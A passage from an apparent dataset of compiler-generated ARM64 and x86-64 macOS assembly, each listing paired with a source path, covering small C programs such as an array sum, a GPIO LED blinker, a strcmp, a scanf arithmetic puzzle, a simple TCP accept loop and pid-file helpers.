mov x8, x10
str x8, [x9, #16]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
ldur x9, [x29, #-24]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_10
b LBB0_9
LBB0_9:
bl ___stack_chk_fail
LBB0_10:
mov w0, #0
add sp, sp, #2944
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
ldp x28, x27, [sp], #32 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%d\t%d\t%d\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $2928, %rsp ## imm = 0xB70
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -2900(%rbp)
leaq -2896(%rbp), %rdi
xorl %esi, %esi
movl $2880, %edx ## imm = 0xB40
callq _memset
movl $0, -2904(%rbp)
movl $0, -2908(%rbp)
movl $0, -2912(%rbp)
movl $720, -2916(%rbp) ## imm = 0x2D0
LBB0_1: ## =>This Loop Header: Depth=1
## Child Loop BB0_3 Depth 2
cmpl $30, -2904(%rbp)
jge LBB0_8
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_3
LBB0_3: ## Parent Loop BB0_1 Depth=1
## => This Inner Loop Header: Depth=2
cmpl $24, -2908(%rbp)
jge LBB0_6
## %bb.4: ## in Loop: Header=BB0_3 Depth=2
movslq -2904(%rbp), %rcx
leaq -2896(%rbp), %rax
imulq $96, %rcx, %rcx
addq %rcx, %rax
movslq -2908(%rbp), %rcx
movl (%rax,%rcx,4), %eax
addl -2912(%rbp), %eax
movl %eax, -2912(%rbp)
## %bb.5: ## in Loop: Header=BB0_3 Depth=2
movl -2908(%rbp), %eax
addl $1, %eax
movl %eax, -2908(%rbp)
jmp LBB0_3
LBB0_6: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_7
LBB0_7: ## in Loop: Header=BB0_1 Depth=1
movl -2904(%rbp), %eax
addl $1, %eax
movl %eax, -2904(%rbp)
jmp LBB0_1
LBB0_8:
movl -2912(%rbp), %esi
movl -2916(%rbp), %eax
movl %eax, -2920(%rbp) ## 4-byte Spill
movl -2912(%rbp), %eax
cltd
idivl -2916(%rbp)
movl -2920(%rbp), %edx ## 4-byte Reload
movl %eax, %ecx
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_10
## %bb.9:
xorl %eax, %eax
addq $2928, %rsp ## imm = 0xB70
popq %rbp
retq
LBB0_10:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%d\t%d\t%d\n"
.subsections_via_symbols
| the_stack_data/629397.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _delay ; -- Begin function delay
.p2align 2
_delay: ; @delay
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str w0, [sp, #12]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #12]
subs w9, w8, #1
str w9, [sp, #12]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_3
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
b LBB0_1
LBB0_3:
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
mov x8, #80
movk x8, #22016, lsl #16
str x8, [sp, #16]
mov x8, #84
movk x8, #22016, lsl #16
str x8, [sp, #8]
str wzr, [sp, #4]
ldr x9, [sp, #16]
ldr w8, [x9]
and w8, w8, #0xffffc0ff
str w8, [x9]
ldr x9, [sp, #16]
ldr w8, [x9]
mov w10, #5376
orr w8, w8, w10
str w8, [x9]
mov w8, #4
str w8, [sp, #4]
b LBB1_1
LBB1_1: ; =>This Inner Loop Header: Depth=1
ldr x9, [sp, #8]
ldr w8, [x9]
orr w8, w8, #0x70
str w8, [x9]
ldr w9, [sp, #4]
mov w8, #1
lsl w10, w8, w9
ldr x9, [sp, #8]
ldr w8, [x9]
bic w8, w8, w10
str w8, [x9]
mov w0, #34464
movk w0, #1, lsl #16
bl _delay
ldr w8, [sp, #4]
add w8, w8, #1
str w8, [sp, #4]
ldr w8, [sp, #4]
subs w8, w8, #7
cset w8, ne
tbnz w8, #0, LBB1_3
b LBB1_2
LBB1_2: ; in Loop: Header=BB1_1 Depth=1
mov w8, #4
str w8, [sp, #4]
b LBB1_3
LBB1_3: ; in Loop: Header=BB1_1 Depth=1
b LBB1_1
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _delay ## -- Begin function delay
.p2align 4, 0x90
_delay: ## @delay
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl %edi, -4(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
movl -4(%rbp), %eax
movl %eax, %ecx
addl $-1, %ecx
movl %ecx, -4(%rbp)
cmpl $0, %eax
je LBB0_3
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_1
LBB0_3:
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl $0, -4(%rbp)
movl $1442840656, %eax ## imm = 0x56000050
movq %rax, -16(%rbp)
movl $1442840660, %eax ## imm = 0x56000054
movq %rax, -24(%rbp)
movl $0, -28(%rbp)
movq -16(%rbp), %rax
movl (%rax), %ecx
andl $-16129, %ecx ## imm = 0xC0FF
movl %ecx, (%rax)
movq -16(%rbp), %rax
movl (%rax), %ecx
orl $5376, %ecx ## imm = 0x1500
movl %ecx, (%rax)
movl $4, -28(%rbp)
LBB1_1: ## =>This Inner Loop Header: Depth=1
movq -24(%rbp), %rax
movl (%rax), %ecx
orl $112, %ecx
movl %ecx, (%rax)
movl -28(%rbp), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
movl %eax, %ecx
xorl $-1, %ecx
movq -24(%rbp), %rax
andl (%rax), %ecx
movl %ecx, (%rax)
movl $100000, %edi ## imm = 0x186A0
callq _delay
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
cmpl $7, -28(%rbp)
jne LBB1_3
## %bb.2: ## in Loop: Header=BB1_1 Depth=1
movl $4, -28(%rbp)
LBB1_3: ## in Loop: Header=BB1_1 Depth=1
jmp LBB1_1
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/42902.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _my_strcmp ; -- Begin function my_strcmp
.p2align 2
_my_strcmp: ; @my_strcmp
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str x0, [sp, #24]
str x1, [sp, #16]
str wzr, [sp, #12]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #24]
ldrsw x9, [sp, #12]
ldrsb w8, [x8, x9]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #8] ; 4-byte Folded Spill
tbnz w8, #0, LBB0_4
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #16]
ldrsw x9, [sp, #12]
ldrsb w8, [x8, x9]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #8] ; 4-byte Folded Spill
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldr x8, [sp, #24]
ldrsw x9, [sp, #12]
ldrsb w8, [x8, x9]
ldr x9, [sp, #16]
ldrsw x10, [sp, #12]
ldrsb w9, [x9, x10]
subs w8, w8, w9
cset w8, eq
str w8, [sp, #8] ; 4-byte Folded Spill
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #8] ; 4-byte Folded Reload
tbz w8, #0, LBB0_6
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB0_1
LBB0_6:
ldr x8, [sp, #24]
ldrsw x9, [sp, #12]
ldrsb w8, [x8, x9]
ldr x9, [sp, #16]
ldrsw x10, [sp, #12]
ldrsb w9, [x9, x10]
subs w0, w8, w9
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _my_strcmp ## -- Begin function my_strcmp
.p2align 4, 0x90
_my_strcmp: ## @my_strcmp
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movl $0, -20(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
movq -8(%rbp), %rax
movslq -20(%rbp), %rcx
movsbl (%rax,%rcx), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -21(%rbp) ## 1-byte Spill
je LBB0_4
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movq -16(%rbp), %rax
movslq -20(%rbp), %rcx
movsbl (%rax,%rcx), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -21(%rbp) ## 1-byte Spill
je LBB0_4
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movq -8(%rbp), %rax
movslq -20(%rbp), %rcx
movsbl (%rax,%rcx), %eax
movq -16(%rbp), %rcx
movslq -20(%rbp), %rdx
movsbl (%rcx,%rdx), %ecx
cmpl %ecx, %eax
sete %al
movb %al, -21(%rbp) ## 1-byte Spill
LBB0_4: ## in Loop: Header=BB0_1 Depth=1
movb -21(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB0_5
jmp LBB0_6
LBB0_5: ## in Loop: Header=BB0_1 Depth=1
movl -20(%rbp), %eax
addl $1, %eax
movl %eax, -20(%rbp)
jmp LBB0_1
LBB0_6:
movq -8(%rbp), %rax
movslq -20(%rbp), %rcx
movsbl (%rax,%rcx), %eax
movq -16(%rbp), %rcx
movslq -20(%rbp), %rdx
movsbl (%rcx,%rdx), %ecx
subl %ecx, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/190767062.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #96
.cfi_def_cfa_offset 96
stp x29, x30, [sp, #80] ; 16-byte Folded Spill
add x29, sp, #80
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
mov x9, sp
sub x8, x29, #8
str x8, [x9]
sub x8, x29, #12
str x8, [x9, #8]
sub x8, x29, #16
str x8, [x9, #16]
sub x8, x29, #20
str x8, [x9, #24]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _scanf
adds w8, w0, #1
cset w8, eq
tbnz w8, #0, LBB0_12
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
mov w8, #12
str w8, [sp, #40]
ldr w8, [sp, #40]
ldur w9, [x29, #-20]
add w8, w8, w9
ldur w9, [x29, #-12]
ldur w10, [x29, #-16]
add w9, w9, w10
subs w8, w8, w9
mov w9, #3
sdiv w8, w8, w9
stur w8, [x29, #-36]
ldr w8, [sp, #40]
ldur w10, [x29, #-20]
add w8, w8, w10
ldur w10, [x29, #-12]
ldur w11, [x29, #-16]
add w10, w10, w11
subs w8, w8, w10
ldur w10, [x29, #-36]
mul w9, w9, w10
subs w8, w8, w9
stur w8, [x29, #-24]
ldur w8, [x29, #-24]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-36]
ldur w9, [x29, #-16]
add w12, w8, w9
ldur w8, [x29, #-36]
ldur w9, [x29, #-12]
add w11, w8, w9
ldur w9, [x29, #-36]
; implicit-def: $x8
mov x8, x9
mov x9, sp
; implicit-def: $x10
mov x10, x12
str x10, [x9]
; implicit-def: $x10
mov x10, x11
str x10, [x9, #8]
str x8, [x9, #16]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-24]
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB0_9
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-8]
ldur w9, [x29, #-12]
add w8, w8, w9
ldur w9, [x29, #-16]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB0_7
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-36]
ldur w9, [x29, #-16]
add w12, w8, w9
ldur w8, [x29, #-36]
ldur w9, [x29, #-12]
add w8, w8, w9
add w11, w8, #1
ldur w9, [x29, #-36]
; implicit-def: $x8
mov x8, x9
mov x9, sp
; implicit-def: $x10
mov x10, x12
str x10, [x9]
; implicit-def: $x10
mov x10, x11
str x10, [x9, #8]
str x8, [x9, #16]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
b LBB0_8
LBB0_7: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-36]
ldur w9, [x29, #-16]
add w8, w8, w9
add w12, w8, #1
ldur w8, [x29, #-36]
ldur w9, [x29, #-12]
add w11, w8, w9
ldur w9, [x29, #-36]
; implicit-def: $x8
mov x8, x9
mov x9, sp
; implicit-def: $x10
mov x10, x12
str x10, [x9]
; implicit-def: $x10
mov x10, x11
str x10, [x9, #8]
str x8, [x9, #16]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
b LBB0_8
LBB0_8: ; in Loop: Header=BB0_1 Depth=1
b LBB0_9
LBB0_9: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-24]
subs w8, w8, #2
cset w8, ne
tbnz w8, #0, LBB0_11
b LBB0_10
LBB0_10: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-36]
ldur w9, [x29, #-16]
add w8, w8, w9
add w12, w8, #1
ldur w8, [x29, #-36]
ldur w9, [x29, #-12]
add w8, w8, w9
add w11, w8, #1
ldur w9, [x29, #-36]
; implicit-def: $x8
mov x8, x9
mov x9, sp
; implicit-def: $x10
mov x10, x12
str x10, [x9]
; implicit-def: $x10
mov x10, x11
str x10, [x9, #8]
str x8, [x9, #16]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
b LBB0_11
LBB0_11: ; in Loop: Header=BB0_1 Depth=1
b LBB0_1
LBB0_12:
mov w0, #0
ldp x29, x30, [sp, #80] ; 16-byte Folded Reload
add sp, sp, #96
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%d%d%d%d"
l_.str.1: ; @.str.1
.asciz "%d %d %d\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movl $0, -4(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
leaq L_.str(%rip), %rdi
leaq -8(%rbp), %rsi
leaq -12(%rbp), %rdx
leaq -16(%rbp), %rcx
leaq -20(%rbp), %r8
movb $0, %al
callq _scanf
cmpl $-1, %eax
je LBB0_12
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movl $12, -40(%rbp)
movl -40(%rbp), %eax
addl -20(%rbp), %eax
movl -12(%rbp), %ecx
addl -16(%rbp), %ecx
subl %ecx, %eax
movl $3, %ecx
cltd
idivl %ecx
movl %eax, -36(%rbp)
movl -40(%rbp), %eax
addl -20(%rbp), %eax
movl -12(%rbp), %ecx
addl -16(%rbp), %ecx
subl %ecx, %eax
imull $3, -36(%rbp), %ecx
subl %ecx, %eax
movl %eax, -24(%rbp)
cmpl $0, -24(%rbp)
jne LBB0_4
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movl -36(%rbp), %esi
addl -16(%rbp), %esi
movl -36(%rbp), %edx
addl -12(%rbp), %edx
movl -36(%rbp), %ecx
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
LBB0_4: ## in Loop: Header=BB0_1 Depth=1
cmpl $1, -24(%rbp)
jne LBB0_9
## %bb.5: ## in Loop: Header=BB0_1 Depth=1
movl -8(%rbp), %eax
addl -12(%rbp), %eax
cmpl -16(%rbp), %eax
je LBB0_7
## %bb.6: ## in Loop: Header=BB0_1 Depth=1
movl -36(%rbp), %esi
addl -16(%rbp), %esi
movl -36(%rbp), %edx
addl -12(%rbp), %edx
addl $1, %edx
movl -36(%rbp), %ecx
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB0_8
LBB0_7: ## in Loop: Header=BB0_1 Depth=1
movl -36(%rbp), %esi
addl -16(%rbp), %esi
addl $1, %esi
movl -36(%rbp), %edx
addl -12(%rbp), %edx
movl -36(%rbp), %ecx
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
LBB0_8: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_9
LBB0_9: ## in Loop: Header=BB0_1 Depth=1
cmpl $2, -24(%rbp)
jne LBB0_11
## %bb.10: ## in Loop: Header=BB0_1 Depth=1
movl -36(%rbp), %esi
addl -16(%rbp), %esi
addl $1, %esi
movl -36(%rbp), %edx
addl -12(%rbp), %edx
addl $1, %edx
movl -36(%rbp), %ecx
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
LBB0_11: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_1
LBB0_12:
xorl %eax, %eax
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%d%d%d%d"
L_.str.1: ## @.str.1
.asciz "%d %d %d\n"
.subsections_via_symbols
| the_stack_data/457469.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #112
.cfi_def_cfa_offset 112
stp x29, x30, [sp, #96] ; 16-byte Folded Spill
add x29, sp, #96
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
mov w2, #0
stur wzr, [x29, #-44]
str w0, [sp, #48]
str x1, [sp, #40]
mov w0, #2
mov w1, #1
bl _socket
str w0, [sp, #36]
ldr w8, [sp, #36]
adds w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _perror
b LBB0_2
LBB0_2:
mov w8, #2
sturb w8, [x29, #-23]
mov w2, #0
stur wzr, [x29, #-20]
ldr x8, [sp, #40]
ldr x0, [x8, #8]
mov x1, #0
bl _strtol
mov x8, x0
and w0, w8, #0xffff
bl __OSSwapInt16
and w8, w0, #0xffff
sturh w8, [x29, #-22]
ldr w0, [sp, #36]
add x3, sp, #12
mov w8, #1
str w8, [sp, #12]
mov w1, #65535
mov w4, #4
mov x2, x4
bl _setsockopt
subs w8, w0, #0
cset w8, ge
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3:
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _perror
b LBB0_4
LBB0_4:
ldr w0, [sp, #36]
sub x1, x29, #24
mov w2, #16
bl _bind
subs w8, w0, #0
cset w8, ge
tbnz w8, #0, LBB0_6
b LBB0_5
LBB0_5:
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _perror
b LBB0_6
LBB0_6:
ldr w0, [sp, #36]
mov w1, #3
bl _listen
mov w8, #16
str w8, [sp, #28]
b LBB0_7
LBB0_7: ; =>This Inner Loop Header: Depth=1
ldr w0, [sp, #36]
sub x1, x29, #40
add x2, sp, #28
bl _accept
str w0, [sp, #32]
subs w8, w0, #0
cset w8, eq
tbnz w8, #0, LBB0_9
b LBB0_8
LBB0_8: ; in Loop: Header=BB0_7 Depth=1
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _puts
ldr w0, [sp, #32]
bl _close
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _puts
b LBB0_7
LBB0_9:
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_11
b LBB0_10
LBB0_10:
bl ___stack_chk_fail
LBB0_11:
mov w0, #0
ldp x29, x30, [sp, #96] ; 16-byte Folded Reload
add sp, sp, #112
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function _OSSwapInt16
__OSSwapInt16: ; @_OSSwapInt16
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
strh w0, [sp, #14]
ldrh w9, [sp, #14]
ldrh w8, [sp, #14]
asr w8, w8, #8
orr w8, w8, w9, lsl #8
and w0, w8, #0xffff
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "Could not create socket"
l_.str.1: ; @.str.1
.asciz "reuse port failed"
l_.str.2: ; @.str.2
.asciz "bind failed"
l_.str.3: ; @.str.3
.asciz "Connection accepted"
l_.str.4: ; @.str.4
.asciz "Connection close"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $96, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -44(%rbp)
movl %edi, -48(%rbp)
movq %rsi, -56(%rbp)
movl $2, %edi
movl $1, %esi
xorl %edx, %edx
callq _socket
movl %eax, -60(%rbp)
cmpl $-1, -60(%rbp)
jne LBB0_2
## %bb.1:
leaq L_.str(%rip), %rdi
callq _perror
LBB0_2:
movb $2, -23(%rbp)
movl $0, -20(%rbp)
movq -56(%rbp), %rax
movq 8(%rax), %rdi
xorl %eax, %eax
movl %eax, %esi
xorl %edx, %edx
callq _strtol
## kill: def $ax killed $ax killed $rax
movzwl %ax, %edi
callq __OSSwapInt16
movzwl %ax, %eax
## kill: def $ax killed $ax killed $eax
movw %ax, -22(%rbp)
movl -60(%rbp), %edi
movl $1, -84(%rbp)
leaq -84(%rbp), %rcx
movl $65535, %esi ## imm = 0xFFFF
movl $4, %r8d
movl %r8d, %edx
callq _setsockopt
cmpl $0, %eax
jge LBB0_4
## %bb.3:
leaq L_.str.1(%rip), %rdi
callq _perror
LBB0_4:
movl -60(%rbp), %edi
leaq -24(%rbp), %rsi
movl $16, %edx
callq _bind
cmpl $0, %eax
jge LBB0_6
## %bb.5:
leaq L_.str.2(%rip), %rdi
callq _perror
LBB0_6:
movl -60(%rbp), %edi
movl $3, %esi
callq _listen
movl $16, -68(%rbp)
LBB0_7: ## =>This Inner Loop Header: Depth=1
movl -60(%rbp), %edi
leaq -40(%rbp), %rsi
leaq -68(%rbp), %rdx
callq _accept
movl %eax, -64(%rbp)
cmpl $0, %eax
je LBB0_9
## %bb.8: ## in Loop: Header=BB0_7 Depth=1
leaq L_.str.3(%rip), %rdi
callq _puts
movl -64(%rbp), %edi
callq _close
leaq L_.str.4(%rip), %rdi
callq _puts
jmp LBB0_7
LBB0_9:
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_11
## %bb.10:
xorl %eax, %eax
addq $96, %rsp
popq %rbp
retq
LBB0_11:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function _OSSwapInt16
__OSSwapInt16: ## @_OSSwapInt16
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movw %di, %ax
movw %ax, -2(%rbp)
movzwl -2(%rbp), %eax
shll $8, %eax
movzwl -2(%rbp), %ecx
sarl $8, %ecx
orl %ecx, %eax
## kill: def $ax killed $ax killed $eax
movzwl %ax, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "Could not create socket"
L_.str.1: ## @.str.1
.asciz "reuse port failed"
L_.str.2: ## @.str.2
.asciz "bind failed"
L_.str.3: ## @.str.3
.asciz "Connection accepted"
L_.str.4: ## @.str.4
.asciz "Connection close"
.subsections_via_symbols
| the_stack_data/66390.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _writepid ; -- Begin function writepid
.p2align 2
_writepid: ; @writepid
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
bl _getpid
str w0, [sp, #12]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
adrp x1, l_.str.1@PAGE
add x1, x1, l_.str.1@PAGEOFF
bl _fopen
mov x8, x0
str x8, [sp, #16]
subs x8, x0, #0
cset w8, ne
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
mov w8, #-1
stur w8, [x29, #-4]
b LBB0_3
LBB0_2:
ldr x0, [sp, #16]
ldr w9, [sp, #12]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x1, l_.str.2@PAGE
add x1, x1, l_.str.2@PAGEOFF
bl _fprintf
ldr x0, [sp, #16]
bl _fclose
mov w8, #1
stur w8, [x29, #-4]
b LBB0_3
LBB0_3:
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _getrunningpid ; -- Begin function getrunningpid
.p2align 2
_getrunningpid: ; @getrunningpid
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
adrp x1, l_.str.3@PAGE
add x1, x1, l_.str.3@PAGEOFF
bl _fopen
mov x8, x0
str x8, [sp, #16]
subs x8, x0, #0
cset w8, ne
tbnz w8, #0, LBB1_2
b LBB1_1
LBB1_1:
mov w8, #-1
stur w8, [x29, #-4]
b LBB1_3
LBB1_2:
ldr x0, [sp, #16]
mov x9, sp
sub x8, x29, #8
str x8, [x9]
adrp x1, l_.str.2@PAGE
add x1, x1, l_.str.2@PAGEOFF
bl _fscanf
ldr x0, [sp, #16]
bl _fclose
ldur w8, [x29, #-8]
stur w8, [x29, #-4]
b LBB1_3
LBB1_3:
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _testpid ; -- Begin function testpid
.p2align 2
_testpid: ; @testpid
.cfi_startproc
; %bb.0:
sub sp, sp, #176
